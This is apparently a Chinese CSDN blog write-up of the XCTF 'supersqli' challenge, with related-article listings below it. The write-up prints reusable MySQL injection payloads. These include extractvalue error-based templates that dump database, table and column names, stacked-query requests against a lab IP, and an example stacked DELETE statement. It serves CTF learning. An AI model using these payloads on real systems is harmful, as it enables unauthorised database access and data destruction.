mysql 多行拼接注入_sql报错注入+叠加注入+sql语句拼接

最新推荐文章于 2024-07-11 00:29:01 发布
最新推荐文章于 2024-07-11 00:29:01 发布
阅读量466 收藏
点赞数
文章标签: mysql 多行拼接注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42297843/article/details/113313164
版权

XCTF题目:supersqli

一打开页面尝试使用“ '  ”发现可以报错注入

xpath语法错误

利用xpath语法错误来进行报错注入主要利用extractvalue和updatexml两个函数。

使用条件:mysql版本>5.1.5

针对mysql数据库:

查数据库名:id='and(select extractvalue(1,concat(0x7e,(select database()))))

爆表名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

爆字段名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))

爆数据:id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

c169f9d2c437f9bb34466fcd468b41bf.png

接着使用报错注入获取数据库名称

http://220.249.52.133:34053/index.php?inject=1' and extractvalue('~',concat(0x7e,database())) --+

4dda196be43514b5ee98dfa1f85d2117.png

取得数据库名称:

supersqli

因为过滤了select,这里尝试使用其他方法。

尝试使用叠加注入

堆叠注入顾名思义是指多条SQL语句一起执行。一条SQL语句以;结束,我们可以在结束符后面继续构造下一条SQL语句,这样它们会一起执行。比如

select * from users;DELETE FROM test

获取表名:

http://220.249.52.133:34053/index.php?inject=1' ;show tables from `supersqli` ;--+

80f898f68a8649a0ea349c4c941f52e1.png

获取字段名

http://220.249.52.133:34053/index.php?inject=1' ;show columns from `1919810931114514` ;--+

30576c639668f63abb1ac54fe36fe924.png

发现一个flag字段,使用字符串拼接,配合预处理语句执行最后得到flag

6fc898ad8b2167aaddee77473ee7324c.png

遇到一个坑:

在这里的admin用了两个不同的符号框起来

情况1:

7d0f251d4c030d92e69e60a4adfd11ca.png

情况2:

fbfe69fecfe8753ec3deeac65dd3e1e6.png

所以表示一个表的名字时要使用 ` 符号

Fan Cheng
关注
SQL注入学习资料总结
墨痕诉清风的博客
05-13 728
结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的。
Oracle学习总结(6)—— SQL注入技术
科技D人生
09-23 2993
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行
mysql 多行拼接注入_MySQL注入汇总
weixin_39654322的博客
02-27 310
Mysql注释符:单行注释: # 在对URL使用过程中可能遇到Unicode编码问题,可常用%23代替多行注释:/**/单行注释: -- 此处需要注意后面存在空格,否则报错0.万能密码(基于SQL验证,SQL注入)aaa' or 1#aaa' or 1; -- 会导致不成功,应为注释掉了sql语句拼接的单引号,导致无法完成查询aaa' or 1; -- aaaaaaaa' or 1; /*****...
mysql 多行结合和拼接sql注入
chouqi7132的博客
06-17 377
select a1.email as email ,a1.bg ,IFNULL(a1.bg, a2.bg) from ( select * from test01 where sdate = '2019-09-11' ) a1 LEFT join (select * from test...
sql注入之联合详解
最新发布
2301_80679350的博客
07-11 1335
SQL 注入是一种常见的网络安全攻击方式,黑客利用它来篡改应用程序后台数据库的 SQL 查询,以实现非法目的。攻击者通过向应用程序的输入字段中插入恶意 SQL 代码,来执行未经授权的数据库操作。
mysql 多行拼接注入_SQL注入技术专题—由浅入深【精华聚合】
weixin_34471172的博客
02-01 339
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。什么是SQL注入SQL注入基本介绍结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL...
mysql注入执行insert_利用insert,update和delete注入获取数据_MySQL
weixin_30857403的博客
01-26 270
0x00 简介利用SQL注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注以及延时注入,通常这些方法都是基于select查询语句中的SQL注射点来实现的。那么,当我们发现了一个基于insert、update、delete语句的注射点时(比如有的网站会记录用户浏览记录,包括referer、client_ip、user-agent等,还有类似于用户注册、密码修改、信息删除等功能),还可...
mysql注入方法_mybatis如何防止sql注入?mybatis 防止sql注入的方法介绍
weixin_39939510的博客
02-02 565
在一些安全性要求很高的应用中(比如银行软件),经常使用将SQL语句全部替换为存储过程这样的方式,来防止SQL注入。这里就跟大家讲解一下mybatis如何防止sql注入和mybatis 防止sql注入的方法。mybatis如何防止sql注入mybatis如何防止sql注入?MyBatis是如何做到SQL预编译的呢?其实在框架底层,是JDBC中的PreparedStatement类在起作用,Prepa...
web安全day49:SQL注入原理、危害、分类,动手写MYSQL最基本操作命令
小梁的博客
01-18 2244
目录 漏*洞原理 注入点可能存在的位置 漏*洞危害 注入方式分类 注入点的判断 MYSQL数据库基本操作命令 查看数据表 mysql常用函数与参数 逻辑运算 注入流程 结构化查询语言(structured query language,SQL),是一种用于数据库中的标准数据查询语言。具有明显的层次结构,包括了库名、表名、字段名、字段内容。 SQL注入SQL injection)是一种常见的Web安全漏*洞,公鸡者利用这个漏*洞,可以访问或者修改数据,或者利用潜在的数据库漏*洞进
SQL学习笔记_Aliyun3
Utopia2JJ的博客
10-27 356
数据库视图,子查询,谓词, CASE表达式等操作学习笔记
MySQL】查询顺序与查询SQL
weixin_43091333的博客
03-14 347
MySQL】查询顺序与查询SQL SQL执行过程 执行过程 我们发送一条SQL给数据库,其实数据库并没有马上执行,而是进行预处理,对SQL进行分析和优化,可以说最终执行SQL不一定是我们提交的SQL。整个过程非常繁杂,详细过程见下图: 虚拟表 数据库提供临时表、内存表、永久表,虚拟表一般要么是临时表,要么是内存表,用完就删除。永久表则数据会存储在磁盘中。 游标 游标实际上是一种能从包括多条数据记录的结果集中每次提取一条记录的机制。游标充当指针的作用。尽管游标能遍历结果中的所有行,但他一次只指向一行。
Mysql优化安全】防止sql注入
weixin_44823875的博客
05-20 6283
Mysql安全】防止sql注入(1)什么是sql注入(2)寻找sql注入的方法(3)mybatis是如何做到防止sql注入的(3.1)sql对比(3.2)简单分析(3.3)底层实现原理(3.4)总结#{}和${}的区别(3.5)总结(3.6)如果手工处理“${xxx}”(3)常见的sql注入问题:数据库查询参数的类型转换处理(4)防范sql注入的思路(5)放置sql注入的方法 (1)什么是sql注入 (1)概念 “SQL注入”是一种利用未过滤/未审核用户输入的攻击方法(“缓存溢出”和这个不同),意思就是让
concat mysql sql注入_MySQLSQL 注入与防范方法
weixin_39586265的博客
12-20 384
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。1.以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间:if (preg_match("/^\w{8,20}$/",...
5种方法防止 jsp被sql注入
收集盒 Book box
09-22 6602
一、 SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。 ===========================================
sql语句拼接问题
z_x_c_的博客
04-30 219
在进行sql语句拼接时,需要在语句后加上空格,否则就会报错 "select * from lesson a join tb_user b " + "on a.createId = b.user_id "+ "where cid not in (select cid from joinedclass a join tb_user b on a.uid = b.user_id where uid=#{uid}) ...
SQL 编程你也行】SQL Server 2012新功能之函数:concat函数
weixin_30439131的博客
01-06 226
concat(value1,value2,value3,...) 字符串的连接,就是把传入的多个参数,按照顺序,连接起来。 下面是一个简单的例子: 实际上,concat函数在sql server中的作用不是很大,因为在这个函数之前,直接通过 + 号,就能实现字符串的相加,而且非常方便: 所以,我猜测增加这个函数,可能是考虑了代码的可移植性,因为在OR...
SQL注入
weixin_62623950的博客
11-25 264
sql注入相关笔记
sql注入基础
weixin_52657559的博客
10-27 1569
sql注入
MySQL SQL注入:information_schema数据库的利用与解析
"本文深入探讨了information_schema数据库在SQL注入攻击中的应用,特别是在MySQL环境下的重要性。这个系统数据库包含了MySQL服务器内所有数据库、表和列的详细信息,为攻击者提供了一个宝贵的工具来获取和利用数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值